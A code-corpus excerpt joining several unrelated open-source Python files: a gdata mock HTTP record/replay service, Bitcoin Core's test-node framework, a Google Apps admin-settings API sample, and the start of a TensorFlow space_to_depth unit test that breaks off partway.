real_request_handler is set.
This function operates in two different modes depending on if
real_request_handler is set or not. If real_request_handler is not set,
HttpRequest will look in this module's recordings list to find a response
which matches the parameters in the function call. If real_request_handler
is set, this function will call real_request_handler.HttpRequest, add the
response to the recordings list, and respond with the actual response.
Args:
service: atom.AtomService object which contains some of the parameters
needed to make the request. The following members are used to
construct the HTTP call: server (str), additional_headers (dict),
port (int), and ssl (bool).
operation: str The HTTP operation to be performed. This is usually one of
'GET', 'POST', 'PUT', or 'DELETE'
data: ElementTree, filestream, list of parts, or other object which can be
converted to a string.
Should be set to None when performing a GET or PUT.
If data is a file-like object which can be read, this method will read
a chunk of 100K bytes at a time and send them.
If the data is a list of parts to be sent, each part will be evaluated
and sent.
uri: The beginning of the URL to which the request should be sent.
Examples: '/', '/base/feeds/snippets',
'/m8/feeds/contacts/default/base'
extra_headers: dict of strings. HTTP headers which should be sent
in the request. These headers are in addition to those stored in
service.additional_headers.
url_params: dict of strings. Key value pairs to be added to the URL as
URL parameters. For example {'foo':'bar', 'test':'param'} will
become ?foo=bar&test=param.
escape_params: bool default True. If true, the keys and values in
url_params will be URL escaped when the form is constructed
(Special characters converted to %XX form.)
content_type: str The MIME type for the data being sent. Defaults to
'application/atom+xml', this is only used if data is set.
"""
full_uri = atom.service.BuildUri(uri, url_params, escape_params)
(server, port, ssl, uri) = atom.service.ProcessUrl(service, uri)
current_request = MockRequest(operation, full_uri, host=server, ssl=ssl,
data=data, extra_headers=extra_headers, url_params=url_params,
escape_params=escape_params, content_type=content_type)
# If the request handler is set, we should actually make the request using
# the request handler and record the response to replay later.
if real_request_handler:
response = real_request_handler.HttpRequest(service, operation, data, uri,
extra_headers=extra_headers, url_params=url_params,
escape_params=escape_params, content_type=content_type)
# TODO: need to copy the HTTP headers from the real response into the
# recorded_response.
recorded_response = MockHttpResponse(body=response.read(),
status=response.status, reason=response.reason)
# Insert a tuple which maps the request to the response object returned
# when making an HTTP call using the real_request_handler.
recordings.append((current_request, recorded_response))
return recorded_response
else:
# Look through available recordings to see if one matches the current
# request.
for request_response_pair in recordings:
if request_response_pair[0].IsMatch(current_request):
return request_response_pair[1]
return None
class MockRequest(object):
"""Represents a request made to an AtomPub server.
These objects are used to determine if a client request matches a recorded
HTTP request to determine what the mock server's response will be.
"""
def __init__(self, operation, uri, host=None, ssl=False, port=None,
data=None, extra_headers=None, url_params=None, escape_params=True,
content_type='application/atom+xml'):
"""Constructor for a MockRequest
Args:
operation: str One of 'GET', 'POST', 'PUT', or 'DELETE' this is the
HTTP operation requested on the resource.
uri: str The URL describing the resource to be modified or feed to be
retrieved. This should include the protocol (http/https) and the host
(aka domain). For example, these are some valid full_uris:
'http://example.com', 'https://www.google.com/accounts/ClientLogin'
host: str (optional) The server name which will be placed at the
beginning of the URL if the uri parameter does not begin with 'http'.
Examples include 'example.com', 'www.google.com', 'www.blogger.com'.
ssl: boolean (optional) If true, the request URL will begin with https
instead of http.
data: ElementTree, filestream, list of parts, or other object which can be
converted to a string. (optional)
Should be set to None when performing a GET or PUT.
If data is a file-like object which can be read, the constructor
will read the entire file into memory. If the data is a list of
parts to be sent, each part will be evaluated and stored.
extra_headers: dict (optional) HTTP headers included in the request.
url_params: dict (optional) Key value pairs which should be added to
the URL as URL parameters in the request. For example uri='/',
url_params={'foo':'1','bar':'2'} could become '/?foo=1&bar=2'.
escape_params: boolean (optional) Perform URL escaping on the keys and
values specified in url_params. Defaults to True.
content_type: str (optional) Provides the MIME type of the data being
sent.
"""
self.operation = operation
self.uri = _ConstructFullUrlBase(uri, host=host, ssl=ssl)
self.data = data
self.extra_headers = extra_headers
self.url_params = url_params or {}
self.escape_params = escape_params
self.content_type = content_type
def ConcealSecrets(self, conceal_func):
"""Conceal secret data in this request."""
if self.extra_headers.has_key('Authorization'):
self.extra_headers['Authorization'] = conceal_func(
self.extra_headers['Authorization'])
def IsMatch(self, other_request):
"""Check to see if the other_request is equivalent to this request.
Used to determine if a recording matches an incoming request so that a
recorded response should be sent to the client.
The matching is not exact, only the operation and URL are examined
currently.
Args:
other_request: MockRequest The request which we want to check this
(self) MockRequest against to see if they are equivalent.
"""
# More accurate matching logic will likely be required.
return (self.operation == other_request.operation and self.uri ==
other_request.uri)
def _ConstructFullUrlBase(uri, host=None, ssl=False):
"""Puts URL components into the form http(s)://full.host.strinf/uri/path
Used to construct a roughly canonical URL so that URLs which begin with
'http://example.com/' can be compared to a uri of '/' when the host is
set to 'example.com'
If the uri contains 'http://host' already, the host and ssl parameters
are ignored.
Args:
uri: str The path component of the URL, examples include '/'
host: str (optional) The host name which should prepend the URL. Example:
'example.com'
ssl: boolean (optional) If true, the returned URL will begin with https
instead of http.
Returns:
String which has the form http(s)://example.com/uri/string/contents
"""
if uri.startswith('http'):
return uri
if ssl:
return 'https://%s%s' % (host, uri)
else:
return 'http://%s%s' % (host, uri)
class MockHttpResponse(object):
"""Returned from MockService crud methods as the server's response."""
def __init__(self, body=None, status=None, reason=None, headers=None):
"""Construct a mock HTTPResponse and set members.
Args:
body: str (optional) The HTTP body of the server's response.
status: int (optional)
reason: str (optional)
headers: dict (optional)
"""
self.body = body
self.status = status
self.reason = reason
self.headers = headers or {}
def read(self):
return self.body
def getheader(self, header_name):
return self.headers[header_name]
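def _replay_example():
    """Usage sketch (illustrative addition; the URL and body are hypothetical).

    Shows the record/replay matching HttpRequest relies on when
    real_request_handler is not set: a recorded (request, response) pair is
    returned for a later request with the same operation and full URL.
    """
    canned = MockHttpResponse(body='<feed/>', status=200, reason='OK')
    recorded = MockRequest('GET', 'http://example.com/base/feeds/snippets')
    recordings.append((recorded, canned))
    incoming = MockRequest('GET', '/base/feeds/snippets', host='example.com')
    for recorded_request, recorded_response in recordings:
        if recorded_request.IsMatch(incoming):
            return recorded_response.read()
    return None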
|
guncoin/guncoin
|
refs/heads/master
|
test/functional/test_framework/test_node.py
|
3
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Class for bitcoind node under test"""
import contextlib
import decimal
import errno
from enum import Enum
import http.client
import json
import logging
import os
import re
import subprocess
import tempfile
import time
import urllib.parse
from .authproxy import JSONRPCException
from .util import (
append_config,
delete_cookie_file,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
)
# For Python 3.4 compatibility
JSONDecodeError = getattr(json, "JSONDecodeError", ValueError)
BITCOIND_PROC_WAIT_TIMEOUT = 60
class FailedToStartError(Exception):
"""Raised when a node fails to start correctly."""
class ErrorMatch(Enum):
FULL_TEXT = 1
FULL_REGEX = 2
PARTIAL_REGEX = 3
class TestNode():
"""A class for representing a bitcoind node under test.
This class contains:
- state about the node (whether it's running, etc)
- a Python subprocess.Popen object representing the running process
- an RPC connection to the node
- one or more P2P connections to the node
To make things easier for the test writer, any unrecognised messages will
be dispatched to the RPC connection."""
def __init__(self, i, datadir, *, rpchost, timewait, bitcoind, bitcoin_cli, mocktime, coverage_dir, extra_conf=None, extra_args=None, use_cli=False):
self.index = i
self.datadir = datadir
self.stdout_dir = os.path.join(self.datadir, "stdout")
self.stderr_dir = os.path.join(self.datadir, "stderr")
self.rpchost = rpchost
self.rpc_timeout = timewait
self.binary = bitcoind
self.coverage_dir = coverage_dir
if extra_conf != None:
append_config(datadir, extra_conf)
# Most callers will just need to add extra args to the standard list below.
# For those callers that need more flexibility, they can just set the args property directly.
# Note that common args are set in the config file (see initialize_datadir)
self.extra_args = extra_args
self.args = [
self.binary,
"-datadir=" + self.datadir,
"-logtimemicros",
"-debug",
"-debugexclude=libevent",
"-debugexclude=leveldb",
"-mocktime=" + str(mocktime),
"-uacomment=testnode%d" % i
]
self.cli = TestNodeCLI(bitcoin_cli, self.datadir)
self.use_cli = use_cli
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.url = None
self.log = logging.getLogger('TestFramework.node%d' % i)
self.cleanup_on_exit = True # Whether to kill the node when this object goes away
self.p2ps = []
def get_deterministic_priv_key(self):
"""Return a deterministic priv key in base58, that only depends on the node's index"""
PRIV_KEYS = [
# address, privkey
('mjTkW3DjgyZck4KbiRusZsqTgaYTxdSz6z', 'cVpF924EspNh8KjYsfhgY96mmxvT6DgdWiTYMtMjuM74hJaU5psW'),
('msX6jQXvxiNhx3Q62PKeLPrhrqZQdSimTg', 'cUxsWyKyZ9MAQTaAhUQWJmBbSvHMwSmuv59KgxQV7oZQU3PXN3KE'),
('mnonCMyH9TmAsSj3M59DsbH8H63U3RKoFP', 'cTrh7dkEAeJd6b3MRX9bZK8eRmNqVCMH3LSUkE3dSFDyzjU38QxK'),
('mqJupas8Dt2uestQDvV2NH3RU8uZh2dqQR', 'cVuKKa7gbehEQvVq717hYcbE9Dqmq7KEBKqWgWrYBa2CKKrhtRim'),
('msYac7Rvd5ywm6pEmkjyxhbCDKqWsVeYws', 'cQDCBuKcjanpXDpCqacNSjYfxeQj8G6CAtH1Dsk3cXyqLNC4RPuh'),
('n2rnuUnwLgXqf9kk2kjvVm8R5BZK1yxQBi', 'cQakmfPSLSqKHyMFGwAqKHgWUiofJCagVGhiB4KCainaeCSxeyYq'),
('myzuPxRwsf3vvGzEuzPfK9Nf2RfwauwYe6', 'cQMpDLJwA8DBe9NcQbdoSb1BhmFxVjWD5gRyrLZCtpuF9Zi3a9RK'),
('mumwTaMtbxEPUswmLBBN3vM9oGRtGBrys8', 'cSXmRKXVcoouhNNVpcNKFfxsTsToY5pvB9DVsFksF1ENunTzRKsy'),
('mpV7aGShMkJCZgbW7F6iZgrvuPHjZjH9qg', 'cSoXt6tm3pqy43UMabY6eUTmR3eSUYFtB2iNQDGgb3VUnRsQys2k'),
]
return PRIV_KEYS[self.index]
def _node_msg(self, msg: str) -> str:
"""Return a modified msg that identifies this node by its index as a debugging aid."""
return "[node %d] %s" % (self.index, msg)
def _raise_assertion_error(self, msg: str):
"""Raise an AssertionError with msg modified to identify this node."""
raise AssertionError(self._node_msg(msg))
def __del__(self):
# Ensure that we don't leave any bitcoind processes lying around after
# the test ends
if self.process and self.cleanup_on_exit:
# Should only happen on test failure
# Avoid using logger, as that may have already been shutdown when
# this destructor is called.
print(self._node_msg("Cleaning up leftover process"))
self.process.kill()
def __getattr__(self, name):
"""Dispatches any unrecognised messages to the RPC connection or a CLI instance."""
if self.use_cli:
return getattr(self.cli, name)
else:
assert self.rpc_connected and self.rpc is not None, self._node_msg("Error: no RPC connection")
return getattr(self.rpc, name)
def start(self, extra_args=None, *, stdout=None, stderr=None, **kwargs):
"""Start the node."""
if extra_args is None:
extra_args = self.extra_args
# Add a new stdout and stderr file each time bitcoind is started
if stderr is None:
stderr = tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False)
if stdout is None:
stdout = tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False)
self.stderr = stderr
self.stdout = stdout
# Delete any existing cookie file -- if such a file exists (eg due to
# unclean shutdown), it will get overwritten anyway by bitcoind, and
# potentially interfere with our attempt to authenticate
delete_cookie_file(self.datadir)
# add environment variable LIBC_FATAL_STDERR_=1 so that libc errors are written to stderr and not the terminal
subp_env = dict(os.environ, LIBC_FATAL_STDERR_="1")
self.process = subprocess.Popen(self.args + extra_args, env=subp_env, stdout=stdout, stderr=stderr, **kwargs)
self.running = True
self.log.debug("bitcoind started, waiting for RPC to come up")
def wait_for_rpc_connection(self):
"""Sets up an RPC connection to the bitcoind process. Returns False if unable to connect."""
# Poll at a rate of four times per second
poll_per_s = 4
for _ in range(poll_per_s * self.rpc_timeout):
if self.process.poll() is not None:
raise FailedToStartError(self._node_msg(
'bitcoind exited with status {} during initialization'.format(self.process.returncode)))
try:
self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
self.rpc.getblockcount()
# If the call to getblockcount() succeeds then the RPC connection is up
self.rpc_connected = True
self.url = self.rpc.url
self.log.debug("RPC successfully started")
return
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
if e.error['code'] != -28: # RPC in warmup?
raise # unknown JSON RPC exception
except ValueError as e: # cookie file not found and no rpcuser or rpcpassword; bitcoind still starting
if "No RPC credentials" not in str(e):
raise
time.sleep(1.0 / poll_per_s)
self._raise_assertion_error("Unable to connect to bitcoind")
def get_wallet_rpc(self, wallet_name):
if self.use_cli:
return self.cli("-rpcwallet={}".format(wallet_name))
else:
assert self.rpc_connected and self.rpc, self._node_msg("RPC not connected")
wallet_path = "wallet/{}".format(urllib.parse.quote(wallet_name))
return self.rpc / wallet_path
def stop_node(self, expected_stderr=''):
"""Stop the node."""
if not self.running:
return
self.log.debug("Stopping node")
try:
self.stop()
except http.client.CannotSendRequest:
self.log.exception("Unable to stop node.")
# Check that stderr is as expected
self.stderr.seek(0)
stderr = self.stderr.read().decode('utf-8').strip()
if stderr != expected_stderr:
raise AssertionError("Unexpected stderr {} != {}".format(stderr, expected_stderr))
self.stdout.close()
self.stderr.close()
del self.p2ps[:]
def is_node_stopped(self):
"""Checks whether the node has stopped.
Returns True if the node has stopped. False otherwise.
This method is responsible for freeing resources (self.process)."""
if not self.running:
return True
return_code = self.process.poll()
if return_code is None:
return False
# process has stopped. Assert that it didn't return an error code.
assert return_code == 0, self._node_msg(
"Node returned non-zero exit code (%d) when stopping" % return_code)
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.log.debug("Node stopped")
return True
def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
wait_until(self.is_node_stopped, timeout=timeout)
@contextlib.contextmanager
def assert_debug_log(self, expected_msgs):
debug_log = os.path.join(self.datadir, 'regtest', 'debug.log')
with open(debug_log, encoding='utf-8') as dl:
dl.seek(0, 2)
prev_size = dl.tell()
try:
yield
finally:
with open(debug_log, encoding='utf-8') as dl:
dl.seek(prev_size)
log = dl.read()
print_log = " - " + "\n - ".join(log.splitlines())
for expected_msg in expected_msgs:
if re.search(re.escape(expected_msg), log, flags=re.MULTILINE) is None:
self._raise_assertion_error('Expected message "{}" does not partially match log:\n\n{}\n\n'.format(expected_msg, print_log))
def assert_start_raises_init_error(self, extra_args=None, expected_msg=None, match=ErrorMatch.FULL_TEXT, *args, **kwargs):
"""Attempt to start the node and expect it to raise an error.
extra_args: extra arguments to pass through to bitcoind
expected_msg: regex that stderr should match when bitcoind fails
Will throw if bitcoind starts without an error.
Will throw if an expected_msg is provided and it does not match bitcoind's stderr."""
with tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False) as log_stderr, \
tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False) as log_stdout:
try:
self.start(extra_args, stdout=log_stdout, stderr=log_stderr, *args, **kwargs)
self.wait_for_rpc_connection()
self.stop_node()
self.wait_until_stopped()
except FailedToStartError as e:
self.log.debug('bitcoind failed to start: %s', e)
self.running = False
self.process = None
# Check stderr for expected message
if expected_msg is not None:
log_stderr.seek(0)
stderr = log_stderr.read().decode('utf-8').strip()
if match == ErrorMatch.PARTIAL_REGEX:
if re.search(expected_msg, stderr, flags=re.MULTILINE) is None:
self._raise_assertion_error(
'Expected message "{}" does not partially match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_REGEX:
if re.fullmatch(expected_msg, stderr) is None:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_TEXT:
if expected_msg != stderr:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
else:
if expected_msg is None:
assert_msg = "bitcoind should have exited with an error"
else:
assert_msg = "bitcoind should have exited with expected error " + expected_msg
self._raise_assertion_error(assert_msg)
def node_encrypt_wallet(self, passphrase):
""""Encrypts the wallet.
This causes bitcoind to shutdown, so this method takes
care of cleaning up resources."""
self.encryptwallet(passphrase)
self.wait_until_stopped()
def add_p2p_connection(self, p2p_conn, *, wait_for_verack=True, **kwargs):
"""Add a p2p connection to the node.
This method adds the p2p connection to the self.p2ps list and also
returns the connection to the caller."""
if 'dstport' not in kwargs:
kwargs['dstport'] = p2p_port(self.index)
if 'dstaddr' not in kwargs:
kwargs['dstaddr'] = '127.0.0.1'
p2p_conn.peer_connect(**kwargs)()
self.p2ps.append(p2p_conn)
if wait_for_verack:
p2p_conn.wait_for_verack()
return p2p_conn
@property
def p2p(self):
"""Return the first p2p connection
Convenience property - most tests only use a single p2p connection to each
node, so this saves having to write node.p2ps[0] many times."""
assert self.p2ps, self._node_msg("No p2p connection")
return self.p2ps[0]
def disconnect_p2ps(self):
"""Close all p2p connections to the node."""
for p in self.p2ps:
p.peer_disconnect()
del self.p2ps[:]
class TestNodeCLIAttr:
def __init__(self, cli, command):
self.cli = cli
self.command = command
def __call__(self, *args, **kwargs):
return self.cli.send_cli(self.command, *args, **kwargs)
def get_request(self, *args, **kwargs):
return lambda: self(*args, **kwargs)
class TestNodeCLI():
"""Interface to bitcoin-cli for an individual node"""
def __init__(self, binary, datadir):
self.options = []
self.binary = binary
self.datadir = datadir
self.input = None
self.log = logging.getLogger('TestFramework.bitcoincli')
def __call__(self, *options, input=None):
# TestNodeCLI is callable with bitcoin-cli command-line options
cli = TestNodeCLI(self.binary, self.datadir)
cli.options = [str(o) for o in options]
cli.input = input
return cli
def __getattr__(self, command):
return TestNodeCLIAttr(self, command)
def batch(self, requests):
results = []
for request in requests:
try:
results.append(dict(result=request()))
except JSONRPCException as e:
results.append(dict(error=e))
return results
def send_cli(self, command=None, *args, **kwargs):
"""Run bitcoin-cli command. Deserializes returned string as python object."""
pos_args = [str(arg).lower() if type(arg) is bool else str(arg) for arg in args]
named_args = [str(key) + "=" + str(value) for (key, value) in kwargs.items()]
assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same bitcoin-cli call"
p_args = [self.binary, "-datadir=" + self.datadir] + self.options
if named_args:
p_args += ["-named"]
if command is not None:
p_args += [command]
p_args += pos_args + named_args
self.log.debug("Running bitcoin-cli command: %s" % command)
process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
cli_stdout, cli_stderr = process.communicate(input=self.input)
returncode = process.poll()
if returncode:
match = re.match(r'error code: ([-0-9]+)\nerror message:\n(.*)', cli_stderr)
if match:
code, message = match.groups()
raise JSONRPCException(dict(code=int(code), message=message))
# Ignore cli_stdout, raise with cli_stderr
raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
try:
return json.loads(cli_stdout, parse_float=decimal.Decimal)
except JSONDecodeError:
return cli_stdout.rstrip("\n")
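# Usage sketch (illustrative addition; the paths below are placeholders):
# TestNodeCLI mirrors the RPC interface -- attribute access produces a callable
# command object and __call__ layers extra bitcoin-cli options. Nothing is run
# until a command object is invoked, so this only shows how calls are formed.
def _cli_interface_example():
    cli = TestNodeCLI('/path/to/bitcoin-cli', '/tmp/test_node0')
    blockchain_info = cli.getblockchaininfo         # TestNodeCLIAttr, not yet executed
    wallet_cli = cli('-rpcwallet=testwallet')       # new CLI instance with extra options
    deferred_call = wallet_cli.getbalance.get_request()  # lambda suitable for cli.batch()
    return blockchain_info, deferred_call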
|
Eseoghene/bite-project
|
refs/heads/master
|
deps/gdata-python-client/samples/apps/adminsettings_example.py
|
41
|
#!/usr/bin/python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains a Sample for Google Apps Admin Settings.
AdminSettingsSample: shows everything you ever wanted to know about
your Google Apps Domain but were afraid to ask.
"""
__author__ = 'jlee@pbu.edu'
import getopt
import getpass
import sys
import time
import gdata.apps.service
import gdata.apps.adminsettings.service
class AdminSettingsSample(object):
"""AdminSettingsSample object demos Admin Settings API."""
def __init__(self, email, password, domain):
"""Constructor for the AdminSettingsSample object.
Takes an email and password corresponding to a google apps admin
account to demo the Admin Settings API.
Args:
email: [string] The e-mail address of the account to use for the sample.
password: [string] The password corresponding to the account specified by
the email parameter.
domain: [string] The domain for the Profiles feed
"""
self.gd_client = gdata.apps.adminsettings.service.AdminSettingsService()
self.gd_client.domain = domain
self.gd_client.email = email
self.gd_client.password = password
self.gd_client.source = 'GoogleInc-AdminSettingsPythonSample-1'
self.gd_client.ProgrammaticLogin()
def Run(self):
# pause 1 sec between calls to prevent quota warnings
print 'Google Apps Domain: ', self.gd_client.domain
time.sleep(1)
print 'Default Language: ', self.gd_client.GetDefaultLanguage()
time.sleep(1)
print 'Organization Name: ', self.gd_client.GetOrganizationName()
time.sleep(1)
print 'Maximum Users: ', self.gd_client.GetMaximumNumberOfUsers()
time.sleep(1)
print 'Current Users: ', self.gd_client.GetCurrentNumberOfUsers()
time.sleep(1)
print 'Domain is Verified: ',self.gd_client.IsDomainVerified()
time.sleep(1)
print 'Support PIN: ',self.gd_client.GetSupportPIN()
time.sleep(1)
print 'Domain Edition: ', self.gd_client.GetEdition()
time.sleep(1)
print 'Customer PIN: ', self.gd_client.GetCustomerPIN()
time.sleep(1)
print 'Domain Creation Time: ', self.gd_client.GetCreationTime()
time.sleep(1)
print 'Domain Country Code: ', self.gd_client.GetCountryCode()
time.sleep(1)
print 'Admin Secondary Email: ', self.gd_client.GetAdminSecondaryEmail()
time.sleep(1)
cnameverificationstatus = self.gd_client.GetCNAMEVerificationStatus()
print 'CNAME Verification Record Name: ', cnameverificationstatus['recordName']
print 'CNAME Verification Verified: ', cnameverificationstatus['verified']
print 'CNAME Verification Method: ', cnameverificationstatus['verificationMethod']
time.sleep(1)
mxverificationstatus = self.gd_client.GetMXVerificationStatus()
print 'MX Verification Verified: ', mxverificationstatus['verified']
print 'MX Verification Method: ', mxverificationstatus['verificationMethod']
time.sleep(1)
ssosettings = self.gd_client.GetSSOSettings()
print 'SSO Enabled: ', ssosettings['enableSSO']
print 'SSO Signon Page: ', ssosettings['samlSignonUri']
print 'SSO Logout Page: ', ssosettings['samlLogoutUri']
print 'SSO Password Page: ', ssosettings['changePasswordUri']
print 'SSO Whitelist IPs: ', ssosettings['ssoWhitelist']
print 'SSO Use Domain Specific Issuer: ', ssosettings['useDomainSpecificIssuer']
time.sleep(1)
ssokey = self.gd_client.GetSSOKey()
print 'SSO Key Modulus: ', ssokey['modulus']
print 'SSO Key Exponent: ', ssokey['exponent']
print 'SSO Key Algorithm: ', ssokey['algorithm']
print 'SSO Key Format: ', ssokey['format']
print 'User Migration Enabled: ', self.gd_client.IsUserMigrationEnabled()
time.sleep(1)
outboundgatewaysettings = self.gd_client.GetOutboundGatewaySettings()
print 'Outbound Gateway Smart Host: ', outboundgatewaysettings['smartHost']
print 'Outbound Gateway Mode: ', outboundgatewaysettings['smtpMode']
def main():
"""Demonstrates use of the Admin Settings API using the AdminSettingsSample object."""
# Parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:], '', ['user=', 'pw=', 'domain='])
except getopt.error, msg:
print 'python adminsettings_example.py --user [username] --pw [password]'
print ' --domain [domain]'
sys.exit(2)
user = ''
pw = ''
domain = ''
# Process options
for option, arg in opts:
if option == '--user':
user = arg
elif option == '--pw':
pw = arg
elif option == '--domain':
domain = arg
while not domain:
print 'NOTE: Please run these tests only with a test account.'
domain = raw_input('Please enter your apps domain: ')
while not user:
user = raw_input('Please enter an administrator account: ')+'@'+domain
while not pw:
pw = getpass.getpass('Please enter password: ')
if not pw:
print 'Password cannot be blank.'
try:
sample = AdminSettingsSample(user, pw, domain)
except gdata.service.BadAuthentication:
print 'Invalid user credentials given.'
return
sample.Run()
if __name__ == '__main__':
main()
|
yaroslavvb/tensorflow
|
refs/heads/master
|
tensorflow/python/kernel_tests/spacetodepth_op_test.py
|
90
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for SpacetoDepth op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class SpaceToDepthTest(test.TestCase):
def _testOne(self, inputs, block_size, outputs):
with self.test_session(use_gpu=True):
x_tf = array_ops.space_to_depth(math_ops.to_float(inputs), block_size)
self.assertAllEqual(x_tf.eval(), outputs)
def testBasic(self):
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 2
x_out = [[[[1, 2, 3, 4]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input dimensions. To make sure elements are
# correctly ordered spatially.
def testLargerInput2x2(self):
x_np = [[[[1], [2], [5], [6]], [[3], [4], [7], [8]],
[[9], [10], [13], [14]], [[11], [12], [15], [16]]]]
block_size = 2
x_out = [[[[1, 2, 3, 4], [5, 6, 7, 8]], [[9, 10, 11, 12],
[13, 14, 15, 16]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input dimensions. To make sure elements are
# correctly ordered in depth. Here, larger block size.
def testLargerInput4x4(self):
x_np = [[[[1], [2], [5], [6]], [[3], [4], [7], [8]],
[[9], [10], [13], [14]], [[11], [12], [15], [16]]]]
block_size = 4
x_out = [[[[1, 2, 5, 6, 3, 4, 7, 8, 9, 10, 13, 14, 11, 12, 15, 16]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input depths.
# To make sure elements are properly interleaved in depth.
def testDepthInterleaved(self):
x_np = [[[[1, 10], [2, 20]], [[3, 30], [4, 40]]]]
block_size = 2
x_out = [[[[1, 10, 2, 20, 3, 30, 4, 40]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input depths. Here an odd depth.
# To make sure elements are properly interleaved in depth.
def testDepthInterleavedDepth3(self):
x_np = [[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]]]
block_size = 2
x_out = [[[[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input dimensions AND for larger input depths.
# To make sure elements are properly interleaved in depth and ordered
# spatially.
def testDepthInterleavedLarge(self):
x_np = [[[[1, 10], [2, 20], [5, 50], [6, 60]],
[[3, 30], [4, 40], [7, 70], [8, 80]],
[[9, 90], [10, 100], [13, 130], [14, 140]],
[[11, 110], [12, 120], [15, 150], [16, 160]]]]
block_size = 2
x_out = [[[[1, 10, 2, 20, 3, 30, 4, 40], [5, 50, 6, 60, 7, 70, 8, 80]],
[[9, 90, 10, 100, 11, 110, 12, 120],
[13, 130, 14, 140, 15, 150, 16, 160]]]]
self._testOne(x_np, block_size, x_out)
def testBlockSize2Batch10(self):
block_size = 2
def batch_input_elt(i):
return [[[1 * i], [2 * i], [5 * i], [6 * i]],
[[3 * i], [4 * i], [7 * i], [8 * i]],
[[9 * i], [10 * i], [13 * i], [14 * i]],
[[11 * i], [12 * i], [15 * i], [16 * i]]]
def batch_output_elt(i):
return [[[1 * i, 2 * i, 3 * i, 4 * i], [5 * i, 6 * i, 7 * i, 8 * i]],
[[9 * i, 10 * i, 11 * i, 12 * i],
[13 * i, 14 * i, 15 * i, 16 * i]]]
batch_size = 10
x_np = [batch_input_elt(i) for i in range(batch_size)]
x_out = [batch_output_elt(i) for i in range(batch_size)]
self._testOne(x_np, block_size, x_out)
# Tests for different width and height.
def testNonSquare(self):
x_np = [[[[1, 10], [2, 20]], [[3, 30], [4, 40]], [[5, 50], [6, 60]],
[[7, 70], [8, 80]], [[9, 90], [10, 100]], [[11, 110], [12, 120]]]]
block_size = 2
x_out = [[[[1, 10, 2, 20, 3, 30, 4, 40]], [[5, 50, 6, 60, 7, 70, 8, 80]],
[[9, 90, 10, 100, 11, 110, 12, 120]]]]
self._testOne(x_np, block_size, x_out)
# Error handling:
def testInputWrongDimMissingDepth(self):
# The input is missing the last dimension ("depth")
x_np = [[[1, 2], [3, 4]]]
block_size = 2
with self.assertRaises(ValueError):
out_tf = array_ops.space_to_depth(x_np, block_size)
out_tf.eval()
def testInputWrongDimMissingBatch(self):
# The input is missing the first dimension ("batch")
x_np = [[[1], [2]], [[3], [4]]]
block_size = 2
with self.assertRaises(ValueError):
_ = array_ops.space_to_depth(x_np, block_size)
def testBlockSize0(self):
# The block size is 0.
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 0
with self.assertRaises(ValueError):
out_tf = array_ops.space_to_depth(x_np, block_size)
out_tf.eval()
def testBlockSizeOne(self):
# The block size is 1. The block size needs to be > 1.
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 1
with self.assertRaises(ValueError):
out_tf = array_ops.space_to_depth(x_np, block_size)
out_tf.eval()
def testBlockSizeLarger(self):
# The block size is too large for this input.
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 10
with self.assertRaises(ValueError):
out_tf = array_ops.space_to_depth(x_np, block_size)
out_tf.eval()
def testBlockSizeNotDivisibleWidth(self):
# The block size divides width but not height.
x_np = [[[[1], [2], [3]], [[3], [4], [7]]]]
